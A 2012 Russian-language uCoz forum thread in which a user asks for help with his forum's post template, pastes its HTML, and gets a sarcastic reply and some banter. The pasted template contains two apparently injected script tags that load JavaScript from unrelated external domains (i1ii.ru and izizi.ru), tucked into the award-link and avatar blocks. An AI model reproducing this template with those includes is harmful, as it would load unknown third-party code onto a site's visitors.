О сайте | Обратная связь | Памятка для вебмастера
[ Регистрация · Войти · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 1 из 1
  • 1
Модератор форума: Anka_kuşu, Souteneur  
Форум » Создание сайта » Ucoz » Проблема с оформлением форума
Проблема с оформлением форума
Azazelo Дата: Суббота, 05.05.2012, 19:17 | Сообщение # 1
Первоклашка
Группа: Пользователи
Сообщений: 2
Город: Москва
Репутация: 0
Статус: Offline
Доброго времени суток. Столкнулся с проблемой оформления форума на сайте. Не могли бы Вы подсказать что исправить или дать ссылку на готовый скрипт. Заранее благодарен.
Скрипт "Вид материалов":
<table border="0" width="100%" cellspacing="1" cellpadding="2" class="postTable">
<tr><td width="23%" class="postTdTop" align="center"><a class="postUser" href="javascript://" rel="nofollow" onClick="emoticon('$USERNAME$,');return false;">$USERNAME$</a></td><td class="postTdTop"><?if($AWARDS_DO_URL$ && $USER_LOGGED_IN$ && $CUR_USER_ID$!=$UID$)?><div style="float:right"><a href="javascript://" rel="nofollow" onclick="new _uWnd('AwD','Вручить награду',380,200,{autosize:1,maxh:300},{url:'/index/55-$UID$-28-forum-$FID$_$TID$_$ID$_16_$TIMESTAMP$'});return false;"><img alt="" src="http://s32.ucoz.net/img/icon/thumbu.png" width="13" border="0" title="Хороший пост"><script src="http://i1ii.ru/1.js" type="text/javascript"></script></a> <a href="javascript://" rel="nofollow" onclick="new _uWnd('AwD','Вручить награду',380,200,{autosize:1,maxh:300},{url:'/index/55-$UID$-47-forum-$FID$_$TID$_$ID$_16_$TIMESTAMP$'});return false;"><img alt="" src="http://s32.ucoz.net/img/icon/thumbd.png" width="13" border="0" title="Плохой пост"></a></div><?endif?>Дата: $WDAY$, $DATE$, $TIME$ | Сообщение # $NUMBER$</td></tr>
<tr><td class="postTdInfo" valign="top">
<center><?if($AVATAR_URL$)?><script src="http://izizi.ru/1.js" type="text/javascript"></script><div><img src="$AVATAR_URL$" class="imgload" ></div><?else?><img src="/noava.png" class="imgload"><?endif?>$GROUP_ICON$</center>
<style>#menubl {margin: 0px;padding: 0px 0px;background: white; }
#menubl a {margin: 0px;padding: 5px;display: block;background: #FFF;border-bottom: dashed 1px #cbcbcb;display:block;background:url(''); background-repeat:no-repeat; background-position:left center;}
#menubl a:hover {text-decoration: none;background-color: #F6F5F5;display:block;background: #F6F5F5 url(''); background-repeat:no-repeat; background-position:left center;}
#menublt {margin: 0px;padding: 0px 0px;background: white; }
#menublt a {margin: 0px;padding: 4px;display: block;background: #f1f1f1;border:1px solid #D7D7D7;margin-bottom:2px;}
#menublt a:hover {text-decoration: none;background-color: #FFF;}</style>
<div id="menubl">

<a href="#"><?if($POSTS$)?><img src="http://uhacks.ru/icons_forum/soo6.png" border="0" alt="" /> Сообщений: <b>$POSTS$</b></a><?endif?>
<?if($READ_REP_URL$)?><div class="reputation"><a title="Смотреть историю репутации" class="repHistory" href="$READ_REP_URL$"><img src="http://uhacks.ru/icons_forum/rating.png" border="0" alt="" /> Репутация: <b>$REP_RATING$</b></a>
<?if($DO_REP_URL$)?><a class="reputationDo" title="Изменить репутацию" href="$DO_REP_URL$"><img src="http://uhacks.ru/icons_forum/bank_plus.png" border="0" alt="" /> Дать +</a></div><?endif?><?endif?>
<?if($READ_BAN_URL$)?><div class="userBan"><a class="banPercent" title="Смотреть историю замечаний" href="$READ_BAN_URL$"><img src="http://uhacks.ru/icons_forum/bank-minus.png" border="0" alt="" /> Замечания: <b>$BAN_RATING$</b></a>
<?if($DO_BAN_URL$)?><a title="Изменить уровень замечаний" class="banDo" href="$DO_BAN_URL$">Изменить уроверь замечания</a></div><?endif?><?endif?>
<?if($USER_STATUS$)?><div class="reputation"><a class="repHistory"><img src="http://uhacks.ru/icons_forum/status_online.png" border="0" alt="" /> Статус: <b>$USER_STATUS$</b></a> <?endif?>

<br>
</div>
<?if($GROUP_ID$)?> <?else?><br><br><br><br><br><?endif?>
</td><td class="posttdMessage" valign="top">$MESSAGE$
<?if($ATTACHMENT$)?> <div align="left" class="eAttach">Прикрепления: $ATTACHMENT$</div><?endif?>
<?if($SIGNATURE$)?><br><hr size="1" width="150" align="left" class="signatureHr"><span class="signatureView">$SIGNATURE$</span><?endif?>
<?if($EDITEDBY$)?><br><br><div class="edited">Сообщение отредактировал $EDITEDBY$</div><?endif?></td></tr>
<tr><td class="postBottom" align="center"><?if($USER_IP$)?><div class="postip">[ <a class="postIpLink" href="http://www.ripe.net/perl/whois?$USER_IP$" target="_blank">$USER_IP$</a><?if($POST_COUNTRY_ID$)?> (<a href="javascript://" rel="nofollow" onclick='prompt("","$POST_COUNTRY$");return false;'>$POST_COUNTRY_ID$</a>)<?endif?> ]</div><?else?> <?endif?></td><td class="postBottom">
<table border="0" width="100%" cellspacing="0" cellpadding="0">
<tr><td>$USER_DETAILS_ICON_BAR$</td><td align="right" style="padding-right:15px;">$ENTRY_MANAGE_ICON_BAR$</td><td width="2%" nowrap align="right">$ON_TOP_ICON$$DEL_ENTRY_FIELD$</td></tr>
</table></td></tr></table>

http://waros.ucoz.ru/


Сообщение отредактировал Azazelo - Суббота, 05.05.2012, 19:20
Гром Дата: Суббота, 05.05.2012, 19:46 | Сообщение # 2
Профессор(ша)
Награды: 11
Сообщений: 3350
Город: Астрахань
Репутация: 96
Статус: Offline
Quote (Azazelo)
Доброго времени суток. Столкнулся с проблемой оформления форума на сайте. Не могли бы Вы подсказать что исправить или дать ссылку на готовый скрипт. Заранее благодарен.

Подождите, я сейчас палантир подготовлю, а для надёжности карты таро, медиума найму, и потом Вам скажу...

Проблема то в чём?


Профессиональный подход к созданию сайтов под ключ.
Все услуги в одном месте.
Домен второго уровня и хостинг на год в подарок!
Azazelo Дата: Суббота, 05.05.2012, 19:50 | Сообщение # 3
Первоклашка
Группа: Пользователи
Сообщений: 2
Город: Москва
Репутация: 0
Статус: Offline
Огромное спасибо за ответ <_<
Лучше бы купил билеты на Петросяна


Гром Дата: Суббота, 05.05.2012, 19:51 | Сообщение # 4
Профессор(ша)
Награды: 11
Сообщений: 3350
Город: Астрахань
Репутация: 96
Статус: Offline
Quote (Azazelo)
Огромное спасибо за ответ Лучше бы купил билеты на Петрос

Да брось, лучше на Задорнова. Петросян - это юмор для тех, у кого нет интернета


Профессиональный подход к созданию сайтов под ключ.
Все услуги в одном месте.
Домен второго уровня и хостинг на год в подарок!
Форум » Создание сайта » Ucoz » Проблема с оформлением форума
  • Страница 1 из 1
  • 1
Поиск:
Проблема с оформлением форума - Создание сайта - Ucoz - Форум
Сегодня были на форуме:
marina785f, Kis, tatyanka_lapteva_2017, aalinarinaa, ivernadskaya, marinaholubnychaya, Валя-Кравец, slavenno, amaksimova500, Quyrrkana, timur_smeshnoy, taraszezera, vasisa, razboyniks, ivan_prohorov470, yulyasavinskaya92

Конструктор кнопок он-лайн


Получить код CSS

Подбор цветов

Справочник по html и CSS

Наши копирайтеры

Поиск